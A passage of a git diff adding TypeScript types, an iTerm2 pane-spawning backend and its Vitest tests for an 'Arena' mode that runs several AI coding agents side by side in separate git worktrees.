} + + off( + event: E, + listener: (payload: ArenaEventMap[E]) => void, + ): void { + this.ee.off(event, listener as (...args: unknown[]) => void); + } + + emit( + event: E, + payload: ArenaEventMap[E], + ): void { + this.ee.emit(event, payload); + } + + once( + event: E, + listener: (payload: ArenaEventMap[E]) => void, + ): void { + this.ee.once(event, listener as (...args: unknown[]) => void); + } + + removeAllListeners(event?: ArenaEvent): void { + if (event) { + this.ee.removeAllListeners(event); + } else { + this.ee.removeAllListeners(); + } + } +} diff --git a/packages/core/src/agents/arena/index.ts b/packages/core/src/agents/arena/index.ts new file mode 100644 index 000000000..e744250c7 --- /dev/null +++ b/packages/core/src/agents/arena/index.ts @@ -0,0 +1,14 @@ +/** + * @license + * Copyright 2025 Qwen Team + * SPDX-License-Identifier: Apache-2.0 + */ + +// Arena-specific exports +export * from './types.js'; +export * from './arena-events.js'; +export * from './ArenaManager.js'; +export * from './ArenaAgentClient.js'; + +// Re-export shared agent infrastructure for backwards compatibility +export * from '../backends/index.js'; diff --git a/packages/core/src/agents/arena/types.ts b/packages/core/src/agents/arena/types.ts new file mode 100644 index 000000000..5b9a9ecab --- /dev/null +++ b/packages/core/src/agents/arena/types.ts @@ -0,0 +1,280 @@ +/** + * @license + * Copyright 2025 Qwen Team + * SPDX-License-Identifier: Apache-2.0 + */ + +import type { Content } from '@google/genai'; +import type { WorktreeInfo } from '../../services/gitWorktreeService.js'; +import type { DisplayMode } from '../backends/types.js'; +import type { AgentStatus } from '../runtime/agent-types.js'; + +/** + * Maximum number of concurrent agents allowed in an Arena session. + */ +export const ARENA_MAX_AGENTS = 5; + +/** + * Represents the status of an Arena session. + */ +export enum ArenaSessionStatus { + /** Session is being set up */ + INITIALIZING = 'initializing', + /** Session is running */ + RUNNING = 'running', + /** All agents finished their current task and are idle (can accept follow-ups) */ + IDLE = 'idle', + /** Session completed for good (winner selected or explicit end) */ + COMPLETED = 'completed', + /** Session was cancelled */ + CANCELLED = 'cancelled', + /** Session failed during initialization */ + FAILED = 'failed', +} + +/** + * Configuration for a model participating in the Arena. + */ +export interface ArenaModelConfig { + /** Model identifier (e.g., 'qwen-coder-plus', 'gpt-4') */ + modelId: string; + /** Authentication type for this model */ + authType: string; + /** Display name for UI */ + displayName?: string; + /** Optional API key override */ + apiKey?: string; + /** Optional base URL override */ + baseUrl?: string; +} + +/** + * Configuration for an Arena session. + */ +export interface ArenaConfig { + /** Unique identifier for this Arena session */ + sessionId: string; + /** The task/prompt to be executed by all agents */ + task: string; + /** Models participating in the Arena */ + models: ArenaModelConfig[]; + /** Maximum number of rounds per agent (default: 50) */ + maxRoundsPerAgent?: number; + /** Total timeout in seconds for the entire Arena session (default: 600) */ + timeoutSeconds?: number; + /** Approval mode inherited from the main process (e.g., 'auto', 'suggest', etc.) */ + approvalMode?: string; + /** Source repository path */ + sourceRepoPath: string; + /** Chat history from the parent session for agent context seeding. */ + chatHistory?: Content[]; +} + +/** + * Statistics for an individual Arena agent. + */ +export interface ArenaAgentStats { + /** Number of completed rounds */ + rounds: number; + /** Total tokens used */ + totalTokens: number; + /** Input tokens used */ + inputTokens: number; + /** Output tokens used */ + outputTokens: number; + /** Total execution time in milliseconds */ + durationMs: number; + /** Number of tool calls made */ + toolCalls: number; + /** Number of successful tool calls */ + successfulToolCalls: number; + /** Number of failed tool calls */ + failedToolCalls: number; +} + +/** + * Result from a single Arena agent. + */ +export interface ArenaAgentResult { + /** Agent identifier */ + agentId: string; + /** Model configuration used */ + model: ArenaModelConfig; + /** Final status */ + status: AgentStatus; + /** Worktree information */ + worktree: WorktreeInfo; + /** Final text output from the agent */ + finalText?: string; + /** Error message if failed */ + error?: string; + /** Execution statistics */ + stats: ArenaAgentStats; + /** Git diff of changes made */ + diff?: string; + /** Files modified by this agent */ + modifiedFiles?: string[]; + /** Start timestamp */ + startedAt: number; + /** End timestamp */ + endedAt?: number; +} + +/** + * Result from an Arena session. + */ +export interface ArenaSessionResult { + /** Session identifier */ + sessionId: string; + /** Original task */ + task: string; + /** Session status */ + status: ArenaSessionStatus; + /** Results from all agents */ + agents: ArenaAgentResult[]; + /** Start timestamp */ + startedAt: number; + /** End timestamp */ + endedAt?: number; + /** Total duration in milliseconds */ + totalDurationMs?: number; + /** Whether the repository was auto-initialized */ + wasRepoInitialized: boolean; + /** Selected winner (agent ID) if user has chosen */ + selectedWinner?: string; +} + +/** + * Options for starting an Arena session. + */ +export interface ArenaStartOptions { + /** Models to participate (at least 2, max ARENA_MAX_AGENTS) */ + models: ArenaModelConfig[]; + /** The task/prompt for all agents */ + task: string; + /** Maximum rounds per agent */ + maxRoundsPerAgent?: number; + /** Timeout in seconds */ + timeoutSeconds?: number; + /** Approval mode to use for agents (inherited from main process) */ + approvalMode?: string; + /** Initial terminal columns for agent PTYs (default: process.stdout.columns or 120) */ + cols?: number; + /** Initial terminal rows for agent PTYs (default: process.stdout.rows or 40) */ + rows?: number; + /** Display mode preference */ + displayMode?: DisplayMode; + /** + * Optional chat history from the main session to seed each arena agent + * with conversational context. When provided, this history is prepended + * to each agent's chat so they understand the prior conversation. + */ + chatHistory?: Content[]; +} + +/** + * Callback functions for Arena events. + */ +export interface ArenaCallbacks { + /** Called when an agent starts */ + onAgentStart?: (agentId: string, model: ArenaModelConfig) => void; + /** Called when an agent completes */ + onAgentComplete?: (result: ArenaAgentResult) => void; + /** Called when agent stats are updated */ + onAgentStatsUpdate?: ( + agentId: string, + stats: Partial, + ) => void; + /** Called when the arena session completes */ + onArenaComplete?: (result: ArenaSessionResult) => void; + /** Called on arena error */ + onArenaError?: (error: Error) => void; +} + +/** + * File format for per-agent status (child → main process). + * Written atomically by ArenaAgentClient to + * `/agents/.json`. + */ +export interface ArenaStatusFile { + agentId: string; + status: AgentStatus; + updatedAt: number; + rounds: number; + currentActivity?: string; + stats: ArenaAgentStats; + finalSummary: string | null; + error: string | null; +} + +/** + * File format for the arena session config file (`config.json`). + * + * Initially written by GitWorktreeService with static config fields + * (arenaSessionId, sourceRepoPath, worktreeNames, baseBranch, createdAt). + * Dynamically updated by ArenaManager with agent status data during polling. + */ +export interface ArenaConfigFile { + /** Arena session identifier */ + arenaSessionId: string; + /** Source repository path */ + sourceRepoPath: string; + /** Names of worktrees created */ + worktreeNames: string[]; + /** Base branch used for worktrees */ + baseBranch?: string; + /** Timestamp when the session was created */ + createdAt: number; + /** Timestamp of the last status update (set by ArenaManager polling) */ + updatedAt?: number; + /** Per-agent status data, keyed by agentId (set by ArenaManager polling) */ + agents?: Record; +} + +/** + * Control signal format for control.json (main → child process). + * Written by ArenaManager, consumed (read + deleted) by ArenaAgentClient. + */ +export interface ArenaControlSignal { + type: 'shutdown' | 'cancel'; + reason: string; + timestamp: number; +} + +/** + * Convert an agentId (e.g. "arena-xxx/qwen-coder-plus") to a filename-safe + * string by replacing path-unsafe characters with "--". + */ +export function safeAgentId(agentId: string): string { + return agentId.replace(/[/\\:*?"<>|]/g, '--'); +} + +/** + * Internal state for tracking an Arena agent during execution. + */ +export interface ArenaAgentState { + /** Agent identifier */ + agentId: string; + /** Model configuration */ + model: ArenaModelConfig; + /** Current status */ + status: AgentStatus; + /** Worktree information */ + worktree: WorktreeInfo; + /** Abort controller for cancellation */ + abortController: AbortController; + /** Current statistics */ + stats: ArenaAgentStats; + /** Start timestamp */ + startedAt: number; + /** Accumulated text output */ + accumulatedText: string; + /** Promise for the agent execution */ + executionPromise?: Promise; + /** Error if failed */ + error?: string; + /** Unique session ID for this agent (for telemetry correlation) */ + agentSessionId: string; + /** Flush latest counters into `stats` (set by in-process event bridge) */ + syncStats?: () => void; +} diff --git a/packages/core/src/agents/backends/ITermBackend.test.ts b/packages/core/src/agents/backends/ITermBackend.test.ts new file mode 100644 index 000000000..124df85ee --- /dev/null +++ b/packages/core/src/agents/backends/ITermBackend.test.ts @@ -0,0 +1,569 @@ +/** + * @license + * Copyright 2025 Qwen Team + * SPDX-License-Identifier: Apache-2.0 + */ + +import { describe, it, expect, beforeEach, afterEach, vi } from 'vitest'; +import type { AgentSpawnConfig } from './types.js'; + +// ─── Hoisted mocks for iterm-it2 ──────────────────────────────── +const hoistedVerifyITerm = vi.hoisted(() => vi.fn()); +const hoistedItermSplitPane = vi.hoisted(() => vi.fn()); +const hoistedItermRunCommand = vi.hoisted(() => vi.fn()); +const hoistedItermSendText = vi.hoisted(() => vi.fn()); +const hoistedItermFocusSession = vi.hoisted(() => vi.fn()); +const hoistedItermCloseSession = vi.hoisted(() => vi.fn()); + +vi.mock('./iterm-it2.js', () => ({ + verifyITerm: hoistedVerifyITerm, + itermSplitPane: hoistedItermSplitPane, + itermRunCommand: hoistedItermRunCommand, + itermSendText: hoistedItermSendText, + itermFocusSession: hoistedItermFocusSession, + itermCloseSession: hoistedItermCloseSession, +})); + +// ─── Hoisted mocks for node:fs/promises ───────────────────────── +const hoistedFsMkdir = vi.hoisted(() => vi.fn()); +const hoistedFsReadFile = vi.hoisted(() => vi.fn()); +const hoistedFsRm = vi.hoisted(() => vi.fn()); + +vi.mock('node:fs/promises', () => ({ + mkdir: hoistedFsMkdir, + readFile: hoistedFsReadFile, + rm: hoistedFsRm, +})); + +// Mock debug logger +vi.mock('../../utils/debugLogger.js', () => ({ + createDebugLogger: () => ({ + info: vi.fn(), + error: vi.fn(), + warn: vi.fn(), + }), +})); + +import { ITermBackend } from './ITermBackend.js'; + +function makeConfig( + agentId: string, + overrides?: Partial, +): AgentSpawnConfig { + return { + agentId, + command: '/usr/bin/node', + args: ['agent.js'], + cwd: '/tmp/test', + ...overrides, + }; +} + +function setupDefaultMocks(): void { + hoistedVerifyITerm.mockResolvedValue(undefined); + hoistedItermSplitPane.mockResolvedValue('sess-new-1'); + hoistedItermRunCommand.mockResolvedValue(undefined); + hoistedItermSendText.mockResolvedValue(undefined); + hoistedItermFocusSession.mockResolvedValue(undefined); + hoistedItermCloseSession.mockResolvedValue(undefined); + hoistedFsMkdir.mockResolvedValue(undefined); + // Default: marker file doesn't exist yet (agent still running) + hoistedFsReadFile.mockRejectedValue(new Error('ENOENT')); + hoistedFsRm.mockResolvedValue(undefined); +} + +describe('ITermBackend', () => { + let backend: ITermBackend; + let savedItermSessionId: string | undefined; + + beforeEach(() => { + vi.useFakeTimers(); + savedItermSessionId = process.env['ITERM_SESSION_ID']; + delete process.env['ITERM_SESSION_ID']; + setupDefaultMocks(); + backend = new ITermBackend(); + }); + + afterEach(async () => { + await backend.cleanup(); + vi.restoreAllMocks(); + vi.useRealTimers(); + if (savedItermSessionId !== undefined) { + process.env['ITERM_SESSION_ID'] = savedItermSessionId; + } else { + delete process.env['ITERM_SESSION_ID']; + } + }); + + // ─── Initialization ───────────────────────────────────────── + + it('throws if spawnAgent is called before init', async () => { + await expect(backend.spawnAgent(makeConfig('a1'))).rejects.toThrow( + 'not initialized', + ); + }); + + it('init verifies iTerm availability', async () => { + await backend.init(); + expect(hoistedVerifyITerm).toHaveBeenCalled(); + }); + + it('init creates exit marker directory', async () => { + await backend.init(); + expect(hoistedFsMkdir).toHaveBeenCalledWith( + expect.stringContaining('agent-iterm-exit-'), + { recursive: true }, + ); + }); + + it('init is idempotent', async () => { + await backend.init(); + await backend.init(); + expect(hoistedVerifyITerm).toHaveBeenCalledTimes(1); + }); + + // ─── Spawning ───────────────────────────────────────────── + + it('spawns first agent using ITERM_SESSION_ID when set', async () => { + process.env['ITERM_SESSION_ID'] = 'leader-sess'; + backend = new ITermBackend(); + await backend.init(); + + await backend.spawnAgent(makeConfig('agent-1')); + + expect(hoistedItermSplitPane).toHaveBeenCalledWith('leader-sess'); + expect(hoistedItermRunCommand).toHaveBeenCalledWith( + 'sess-new-1', + expect.any(String), + ); + expect(backend.getActiveAgentId()).toBe('agent-1'); + }); + + it('spawns first agent without ITERM_SESSION_ID', async () => { + await backend.init(); + await backend.spawnAgent(makeConfig('agent-1')); + + expect(hoistedItermSplitPane).toHaveBeenCalledWith(undefined); + expect(backend.getActiveAgentId()).toBe('agent-1'); + }); + + it('spawns subsequent agent from last session', async () => { + await backend.init(); + + hoistedItermSplitPane.mockResolvedValueOnce('sess-1'); + await backend.spawnAgent(makeConfig('agent-1')); + + hoistedItermSplitPane.mockResolvedValueOnce('sess-2'); + await backend.spawnAgent(makeConfig('agent-2')); + + // Second split should use the first agent's session as source + expect(hoistedItermSplitPane).toHaveBeenLastCalledWith('sess-1'); + }); + + it('rejects duplicate agent IDs', async () => { + await backend.init(); + await backend.spawnAgent(makeConfig('dup')); + + await expect(backend.spawnAgent(makeConfig('dup'))).rejects.toThrow( + 'already exists', + ); + }); + + it('registers failed agent and fires exit callback on spawn error', async () => { + await backend.init(); + hoistedItermSplitPane.mockRejectedValueOnce(new Error('split failed')); + + const exitCallback = vi.fn(); + backend.setOnAgentExit(exitCallback); + + await backend.spawnAgent(makeConfig('fail')); + + expect(exitCallback).toHaveBeenCalledWith('fail', 1, null); + }); + + // ─── buildShellCommand (env key validation) ──────────────── + + it('rejects invalid environment variable names', async () => { + await backend.init(); + + await expect( + backend.spawnAgent(makeConfig('bad-env', { env: { 'FOO BAR': 'baz' } })), + ).rejects.toThrow('Invalid environment variable name'); + }); + + it('rejects env key starting with a digit', async () => { + await backend.init(); + + await expect( + backend.spawnAgent(makeConfig('bad-env', { env: { '1VAR': 'baz' } })), + ).rejects.toThrow('Invalid environment variable name'); + }); + + it('accepts valid environment variable names', async () => { + await backend.init(); + + await expect( + backend.spawnAgent( + makeConfig('good-env', { + env: { MY_VAR_123: 'hello', _PRIVATE: 'world' }, + }), + ), + ).resolves.toBeUndefined(); + }); + + // ─── buildShellCommand (atomic marker write) ────────────── + + it('builds command with atomic exit marker write', async () => { + await backend.init(); + await backend.spawnAgent(makeConfig('a')); + + const cmdArg = hoistedItermRunCommand.mock.calls[0]![1] as string; + // Should contain write-then-rename pattern + expect(cmdArg).toMatch(/echo \$\? > .+\.tmp.+ && mv .+\.tmp/); + }); + + it('builds command with cd and quoted args', async () => { + await backend.init(); + await backend.spawnAgent(makeConfig('a')); + + const cmdArg = hoistedItermRunCommand.mock.calls[0]![1] as string; + expect(cmdArg).toContain("cd '/tmp/test'"); + expect(cmdArg).toContain("'/usr/bin/node'"); + expect(cmdArg).toContain("'agent.js'"); + }); + + it('includes env vars in command when provided', async () => { + await backend.init(); + await backend.spawnAgent(makeConfig('a', { env: { NODE_ENV: 'test' } })); + + const cmdArg = hoistedItermRunCommand.mock.calls[0]![1] as string; + expect(cmdArg).toContain("NODE_ENV='test'"); + expect(cmdArg).toContain('env '); + }); + + // ─── Navigation ─────────────────────────────────────────── + + it('switchTo changes active agent and focuses session', async () => { + await backend.init(); + hoistedItermSplitPane.mockResolvedValueOnce('sess-1'); + await backend.spawnAgent(makeConfig('a')); + + hoistedItermSplitPane.mockResolvedValueOnce('sess-2'); + await backend.spawnAgent(makeConfig('b')); + + backend.switchTo('b'); + expect(backend.getActiveAgentId()).toBe('b'); + expect(hoistedItermFocusSession).toHaveBeenCalledWith('sess-2'); + }); + + it('switchTo throws for unknown agent', async () => { + await backend.init(); + expect(() => backend.switchTo('ghost')).toThrow('not found'); + }); + + it('switchToNext and switchToPrevious cycle correctly', async () => { + await backend.init(); + + hoistedItermSplitPane.mockResolvedValueOnce('sess-1'); + await backend.spawnAgent(makeConfig('a')); + + hoistedItermSplitPane.mockResolvedValueOnce('sess-2'); + await backend.spawnAgent(makeConfig('b')); + + expect(backend.getActiveAgentId()).toBe('a'); + backend.switchToNext(); + expect(backend.getActiveAgentId()).toBe('b'); + backend.switchToNext(); + expect(backend.getActiveAgentId()).toBe('a'); + backend.switchToPrevious(); + expect(backend.getActiveAgentId()).toBe('b'); + }); + + it('switchToNext does nothing with a single agent', async () => { + await backend.init(); + await backend.spawnAgent(makeConfig('solo')); + backend.switchToNext(); + expect(backend.getActiveAgentId()).toBe('solo'); + }); + + it('switchToPrevious does nothing with a single agent', async () => { + await backend.init(); + await backend.spawnAgent(makeConfig('solo')); + backend.switchToPrevious(); + expect(backend.getActiveAgentId()).toBe('solo'); + }); + + // ─── Stop & Cleanup ────────────────────────────────────── + + it('stopAgent closes session and fires exit callback', async () => { + await backend.init(); + hoistedItermSplitPane.mockResolvedValueOnce('sess-1'); + await backend.spawnAgent(makeConfig('a')); + + const exitCallback = vi.fn(); + backend.setOnAgentExit(exitCallback); + + backend.stopAgent('a'); + + expect(hoistedItermCloseSession).toHaveBeenCalledWith('sess-1'); + expect(exitCallback).toHaveBeenCalledWith('a', 1, null); + }); + + it('stopAgent is a no-op for already-stopped agent', async () => { + await backend.init(); + await backend.spawnAgent(makeConfig('a')); + backend.stopAgent('a'); + hoistedItermCloseSession.mockClear(); + + backend.stopAgent('a'); + expect(hoistedItermCloseSession).not.toHaveBeenCalled(); + }); + + it('stopAgent is a no-op for unknown agent', async () => { + await backend.init(); + backend.stopAgent('ghost'); + expect(hoistedItermCloseSession).not.toHaveBeenCalled(); + }); + + it('stopAll closes all sessions and resets activeAgentId', async () => { + await backend.init(); + hoistedItermSplitPane.mockResolvedValueOnce('sess-1'); + await backend.spawnAgent(makeConfig('a')); + + hoistedItermSplitPane.mockResolvedValueOnce('sess-2'); + await backend.spawnAgent(makeConfig('b')); + + const exitCallback = vi.fn(); + backend.setOnAgentExit(exitCallback); + + backend.stopAll(); + + expect(hoistedItermCloseSession).toHaveBeenCalledTimes(2); + expect(exitCallback).toHaveBeenCalledTimes(2); + expect(backend.getActiveAgentId()).toBeNull(); + }); + + it('cleanup closes sessions and removes exit marker directory', async () => { + await backend.init(); + hoistedItermSplitPane.mockResolvedValueOnce('sess-1'); + await backend.spawnAgent(makeConfig('a')); + + await backend.cleanup(); + + expect(hoistedItermCloseSession).toHaveBeenCalledWith('sess-1'); + expect(hoistedFsRm).toHaveBeenCalledWith( + expect.stringContaining('agent-iterm-exit-'), + { recursive: true, force: true }, + ); + expect(backend.getActiveAgentId()).toBeNull(); + }); + + it('cleanup tolerates session close errors', async () => { + await backend.init(); + hoistedItermSplitPane.mockResolvedValueOnce('sess-1'); + await backend.spawnAgent(makeConfig('a')); + + hoistedItermCloseSession.mockRejectedValueOnce(new Error('session gone')); + + // Should not throw + await expect(backend.cleanup()).resolves.toBeUndefined(); + }); + + it('cleanup tolerates exit marker removal errors', async () => { + await backend.init(); + hoistedFsRm.mockRejectedValueOnce(new Error('ENOENT')); + + // Should not throw + await expect(backend.cleanup()).resolves.toBeUndefined(); + }); + + // ─── Exit Detection ───────────────────────────────────────── + + it('marks agent as exited when marker file appears', async () => { + await backend.init(); + await backend.spawnAgent(makeConfig('a')); + + const exitCallback = vi.fn(); + backend.setOnAgentExit(exitCallback); + + // Simulate marker file appearing with exit code 0 + hoistedFsReadFile.mockResolvedValue('0\n'); + + await vi.advanceTimersByTimeAsync(600); + + expect(exitCallback).toHaveBeenCalledWith('a', 0, null); + }); + + it('preserves non-zero exit codes from marker', async () => { + await backend.init(); + await backend.spawnAgent(makeConfig('a')); + + const exitCallback = vi.fn(); + backend.setOnAgentExit(exitCallback); + + hoistedFsReadFile.mockResolvedValue('42\n'); + + await vi.advanceTimersByTimeAsync(600); + + expect(exitCallback).toHaveBeenCalledWith('a', 42, null); + }); + + it('defaults to exit code 1 when marker contains NaN', async () => { + await backend.init(); + await backend.spawnAgent(makeConfig('a')); + + const exitCallback = vi.fn(); + backend.setOnAgentExit(exitCallback); + + hoistedFsReadFile.mockResolvedValue('garbage\n'); + + await vi.advanceTimersByTimeAsync(600); + + expect(exitCallback).toHaveBeenCalledWith('a', 1, null); + }); + + it('does not fire callback twice for the same agent', async () => { + await backend.init(); + await backend.spawnAgent(makeConfig('a')); + + const exitCallback = vi.fn(); + backend.setOnAgentExit(exitCallback); + + hoistedFsReadFile.mockResolvedValue('0\n'); + + await vi.advanceTimersByTimeAsync(600); + await vi.advanceTimersByTimeAsync(600); + + expect(exitCallback).toHaveBeenCalledTimes(1); + }); + + it('stops polling once all agents have exited', async () => { + await backend.init(); + await backend.spawnAgent(makeConfig('a')); + + hoistedFsReadFile.mockResolvedValue('0\n'); + + await vi.advanceTimersByTimeAsync(600); + + // Reset to track future reads + hoistedFsReadFile.mockClear(); + + // Advance more — should not poll anymore + await vi.advanceTimersByTimeAsync(2000); + expect(hoistedFsReadFile).not.toHaveBeenCalled(); + }); + + // ─── waitForAll ───────────────────────────────────────────── + + it('waitForAll resolves immediately when no agents exist', async () => { + await backend.init(); + const result = await backend.waitForAll(); + expect(result).toBe(true); + }); + + it('waitForAll resolves when all agents exit', async () => { + await backend.init(); + await backend.spawnAgent(makeConfig('a')); + + hoistedFsReadFile.mockResolvedValue('0\n'); + + const waitPromise = backend.waitForAll(); + await vi.advanceTimersByTimeAsync(600); + + const result = await waitPromise; + expect(result).toBe(true); + }); + + it('waitForAll returns false on timeout', async () => { + await backend.init(); + await backend.spawnAgent(makeConfig('a')); + + // Marker never appears (readFile keeps throwing) + const waitPromise = backend.waitForAll(1000); + await vi.advanceTimersByTimeAsync(1100); + + const result = await waitPromise; + expect(result).toBe(false); + }); + + // ─── Input ───────────────────────────────────────────────── + + it('writeToAgent sends text via itermSendText', async () => { + await backend.init(); + hoistedItermSplitPane.mockResolvedValueOnce('sess-1'); + await backend.spawnAgent(makeConfig('a')); + + const result = backend.writeToAgent('a', 'hello'); + expect(result).toBe(true); + expect(hoistedItermSendText).toHaveBeenCalledWith('sess-1', 'hello'); + }); + + it('writeToAgent returns false for unknown agent', async () => { + await backend.init(); + expect(backend.writeToAgent('ghost', 'hello')).toBe(false); + }); + + it('writeToAgent returns false for stopped agent', async () => { + await backend.init(); + await backend.spawnAgent(makeConfig('a')); + backend.stopAgent('a'); + + expect(backend.writeToAgent('a', 'hello')).toBe(false); + }); + + it('forwardInput delegates to active agent', async () => { + await backend.init(); + hoistedItermSplitPane.mockResolvedValueOnce('sess-1'); + await backend.spawnAgent(makeConfig('a')); + + const result = backend.forwardInput('hello'); + expect(result).toBe(true); + expect(hoistedItermSendText).toHaveBeenCalledWith('sess-1', 'hello'); + }); + + it('forwardInput returns false with no active agent', async () => { + await backend.init(); + expect(backend.forwardInput('hello')).toBe(false); + }); + + // ─── Snapshots ────────────────────────────────────────────── + + it('getActiveSnapshot returns null', async () => { + await backend.init(); + await backend.spawnAgent(makeConfig('a')); + expect(backend.getActiveSnapshot()).toBeNull(); + }); + + it('getAgentSnapshot returns null', async () => { + await backend.init(); + await backend.spawnAgent(makeConfig('a')); + expect(backend.getAgentSnapshot('a')).toBeNull(); + }); + + it('getAgentScrollbackLength returns 0', async () => { + await backend.init(); + await backend.spawnAgent(makeConfig('a')); + expect(backend.getAgentScrollbackLength('a')).toBe(0); + }); + + // ─── getAttachHint ────────────────────────────────────────── + + it('getAttachHint returns null', async () => { + await backend.init(); + expect(backend.getAttachHint()).toBeNull(); + }); + + // ─── resizeAll ────────────────────────────────────────────── + + it('resizeAll is a no-op', async () => { + await backend.init(); + // Should not throw + backend.resizeAll(80, 24); + }); + + // ─── type ─────────────────────────────────────────────────── + + it('has type "iterm2"', () => { + expect(backend.type).toBe('iterm2'); + }); +}); diff --git a/packages/core/src/agents/backends/ITermBackend.ts b/packages/core/src/agents/backends/ITermBackend.ts new file mode 100644 index 000000000..7ff24c44b --- /dev/null +++ b/packages/core/src/agents/backends/ITermBackend.ts @@ -0,0 +1,431 @@ +/** + * @license + * Copyright 2025 Qwen Team + * SPDX-License-Identifier: Apache-2.0 + */ + +/** + * @fileoverview ITermBackend implements Backend using the it2 CLI + * (iTerm2 Python API). + * + * Each agent runs in its own iTerm2 split pane. The backend manages pane + * creation, exit detection (via exit marker file polling), and cleanup. + * + * Exit detection uses a file-based marker approach: each agent's command is + * wrapped to write its exit code to a temp file on completion, which the backend + * polls to detect exits. + */ + +import * as fs from 'node:fs/promises'; +import * as path from 'node:path'; +import * as os from 'node:os'; +import { createDebugLogger } from '../../utils/debugLogger.js'; +import type { AnsiOutput } from '../../utils/terminalSerializer.js'; +import { DISPLAY_MODE } from './types.js'; +import type { AgentSpawnConfig, AgentExitCallback, Backend } from './types.js'; +import { + verifyITerm, + itermSplitPane, + itermRunCommand, + itermSendText, + itermFocusSession, + itermCloseSession, +} from './iterm-it2.js'; + +const debugLogger = createDebugLogger('ITERM_BACKEND'); + +/** Polling interval for exit detection (ms) */ +const EXIT_POLL_INTERVAL_MS = 500; + +interface ITermAgentSession { + agentId: string; + sessionId: string; + exitMarkerPath: string; + status: 'running' | 'exited'; + exitCode: number; +} + +export class ITermBackend implements Backend { + readonly type = DISPLAY_MODE.ITERM2; + + /** Directory for exit marker files */ + private exitMarkerDir: string; + /** Session ID of the last agent pane (split source) */ + private lastSplitSessionId: string | null = null; + + private sessions: Map = new Map(); + private agentOrder: string[] = []; + private activeAgentId: string | null = null; + private onExitCallback: AgentExitCallback | null = null; + private exitPollTimer: NodeJS.Timeout | null = null; + private initialized = false; + /** Number of agents currently being spawned asynchronously */ + private pendingSpawns = 0; + /** Queue to serialize spawn operations (prevents split race conditions) */ + private spawnQueue: Promise = Promise.resolve(); + + constructor() { + this.exitMarkerDir = path.join( + os.tmpdir(), + `agent-iterm-exit-${Date.now().toString(36)}`, + ); + } + + async init(): Promise { + if (this.initialized) return; + + await verifyITerm(); + + // Create the exit marker directory + await fs.mkdir(this.exitMarkerDir, { recursive: true }); + + this.initialized = true; + debugLogger.info('ITermBackend initialized'); + } + + // ─── Agent Lifecycle ──────────────────────────────────────── + + async spawnAgent(config: AgentSpawnConfig): Promise { + if (!this.initialized) { + throw new Error('ITermBackend not initialized. Call init() first.'); + } + if (this.sessions.has(config.agentId)) { + throw new Error(`Agent "${config.agentId}" already exists.`); + } + + const exitMarkerPath = path.join(this.exitMarkerDir, config.agentId); + await fs.mkdir(path.dirname(exitMarkerPath), { recursive: true }); + const cmd = this.buildShellCommand(config, exitMarkerPath); + + this.pendingSpawns++; + const spawnPromise = this.spawnQueue.then(() => + this.spawnAgentAsync(config.agentId, cmd, exitMarkerPath), + ); + this.spawnQueue = spawnPromise; + await spawnPromise; + } + + private async spawnAgentAsync( + agentId: string, + cmd: string, + exitMarkerPath: string, + ): Promise { + try { + let sessionId: string; + + if (this.sessions.size === 0) { + // First agent: split from ITERM_SESSION_ID if present, else active session + const leaderSessionId = process.env['ITERM_SESSION_ID'] || undefined; + sessionId = await itermSplitPane(leaderSessionId); + await itermRunCommand(sessionId, cmd); + } else { + // Subsequent agents: split from last agent session, else active session + sessionId = await itermSplitPane(this.lastSplitSessionId || undefined); + await itermRunCommand(sessionId, cmd); + } + + const agentSession: ITermAgentSession = { + agentId, + sessionId, + exitMarkerPath, + status: 'running', + exitCode: 0, + }; + + this.sessions.set(agentId, agentSession); + this.agentOrder.push(agentId); + this.lastSplitSessionId = sessionId; + + if (this.activeAgentId === null) { + this.activeAgentId = agentId; + } + + this.startExitPolling(); + + debugLogger.info(`Spawned agent "${agentId}" in session ${sessionId}`); + } catch (error) { + debugLogger.error(`Failed to spawn agent "${agentId}":`, error); + this.sessions.set(agentId, { + agentId, + sessionId: '', + exitMarkerPath, + status: 'exited', + exitCode: 1, + }); + this.agentOrder.push(agentId); + this.onExitCallback?.(agentId, 1, null); + } finally { + this.pendingSpawns--; + } + } + + stopAgent(agentId: string): void { + const session = this.sessions.get(agentId); + if (!session || session.status !== 'running') return; + itermCloseSession(session.sessionId).catch((e) => + debugLogger.error(`Failed to close session for agent "${agentId}": ${e}`), + ); + session.status = 'exited'; + session.exitCode = 1; + this.onExitCallback?.(agentId, 1, null); + debugLogger.info(`Closed iTerm2 session for agent "${agentId}"`); + } + + stopAll(): void { + for (const session of this.sessions.values()) { + if (session.status === 'running') { + itermCloseSession(session.sessionId).catch((e) => + debugLogger.error( + `Failed to close session for agent "${session.agentId}": ${e}`, + ), + ); + session.status = 'exited'; + session.exitCode = 1; + this.onExitCallback?.(session.agentId, 1, null); + } + } + this.activeAgentId = null; + } + + async cleanup(): Promise { + this.stopExitPolling(); + + // Close all iTerm2 sessions we created + for (const session of this.sessions.values()) { + if (!session.sessionId) continue; + try { + await itermCloseSession(session.sessionId); + } catch (error) { + debugLogger.error('Session cleanup error (ignored):', error); + } + } + + // Clean up exit marker files + try { + await fs.rm(this.exitMarkerDir, { + recursive: true, + force: true, + }); + } catch (error) { + debugLogger.error('Exit marker cleanup error (ignored):', error); + } + + this.sessions.clear(); + this.agentOrder = []; + this.activeAgentId = null; + this.lastSplitSessionId = null; + } + + setOnAgentExit(callback: AgentExitCallback): void { + this.onExitCallback = callback; + } + + async waitForAll(timeoutMs?: number): Promise { + if (this.allExited()) return true; + + return new Promise((resolve) => { + let timeoutHandle: NodeJS.Timeout | undefined; + + const checkInterval = setInterval(() => { + if (this.allExited()) { + clearInterval(checkInterval); + if (timeoutHandle) clearTimeout(timeoutHandle); + resolve(true); + } + }, EXIT_POLL_INTERVAL_MS); + + if (timeoutMs !== undefined) { + timeoutHandle = setTimeout(() => { + clearInterval(checkInterval); + resolve(false); + }, timeoutMs); + } + }); + } + + // ─── Active Agent & Navigation ────────────────────────────── + + switchTo(agentId: string): void { + if (!this.sessions.has(agentId)) { + throw new Error(`Agent "${agentId}" not found.`); + } + const session = this.sessions.get(agentId)!; + this.activeAgentId = agentId; + itermFocusSession(session.sessionId).catch((e) => + debugLogger.error(`Failed to focus session for agent "${agentId}": ${e}`), + ); + } + + switchToNext(): void { + if (this.agentOrder.length <= 1) return; + const currentIndex = this.agentOrder.indexOf(this.activeAgentId ?? ''); + const nextIndex = (currentIndex + 1) % this.agentOrder.length; + this.switchTo(this.agentOrder[nextIndex]!); + } + + switchToPrevious(): void { + if (this.agentOrder.length <= 1) return; + const currentIndex = this.agentOrder.indexOf(this.activeAgentId ?? ''); + const prevIndex = + (currentIndex - 1 + 